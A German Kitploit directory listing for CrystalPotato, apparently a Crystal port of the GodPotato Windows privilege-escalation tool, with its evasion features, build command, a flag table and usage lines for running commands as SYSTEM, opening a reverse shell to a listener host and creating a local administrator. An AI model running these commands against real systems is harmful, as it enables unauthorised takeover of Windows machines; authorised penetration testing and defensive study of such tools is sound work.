Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CrystalPotato — Crystal-Port von GodPotato zur Ausnutzung von SeImpersonatePrivilege mit indirekten Syscalls, dynamischer API-Auflösung und String-Obfuskation zur Kompilierzeit. Befehle ausführen, Reverse Shells starten oder Benutzer hinzufügen. | Kitploit
Tools/GitHubGitHub/ricardojoserf/crystalpotato
Privilege EscalationExploitationPost-ExploitationPenetrationstestsRed TeamingAdversarial-Angriff
GitHubricardojoserf/crystalpotato

CrystalPotato

Crystal-Port von GodPotato zur Ausnutzung von SeImpersonatePrivilege mit indirekten Syscalls, dynamischer API-Auflösung und String-Obfuskation zur Kompilierzeit. Befehle ausführen, Reverse Shells starten oder Benutzer hinzufügen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
8vor 1 TagNoch nicht geprüft

CrystalPotato

Crystal-Port von GodPotato, einer lokalen Privilegienausweitung von Konten mit SeImpersonatePrivilege zu SYSTEM. Es funktioniert durch Missbrauch des DCOM-OXID-Resolvers und Named-Pipe-Impersonation.

Windows-APIs werden dynamisch aufgelöst und über indirekte Syscall-Stubs aufgerufen, alle Zeichenfolgen werden zur Kompilierzeit XOR-obfuskiert und standardmäßig wird nur die Befehlsausgabe ausgegeben. Getestet auf Windows 10, 11 und Server 2025.

CrystalPotato

Kompilieren

CrystalPotato kompiliert mit Crystal on Windows zu einer einzigen Datei ohne Abhängigkeiten:

root@kitploit:~
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static

Verwendung

Einen Befehl ausführen, eine Reverse Shell starten oder einen lokalen Administrator erstellen.

root@kitploit:~
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

img2

Quellen

  • GodPotato - Ursprüngliche C#-Implementierung von BeichenDream.

  • RustPotato - Rust-Implementierung von safedv.

  • SigmaPotato - C#-Implementierung mit zusätzlichen Funktionen von tylerdotrar.

Tool herunterladen
FlagBeschreibung
-c CMDAls SYSTEM auszuführender Befehl oder Shell für die Reverse Shell (Standard: cmd.exe)
-H HOSTReverse-Shell-Listener-Host
-P PORTReverse-Shell-Listener-Port
-u USERLokalen Administrator erstellen - Benutzername
-pw PASSLokalen Administrator erstellen - Passwort
-p NAMEBenutzerdefinierter Pipe-Name (Standard: Crystal)
-dDebug-Ausgabe
-ddVollständige Ablaufverfolgung
-hHilfe anzeigen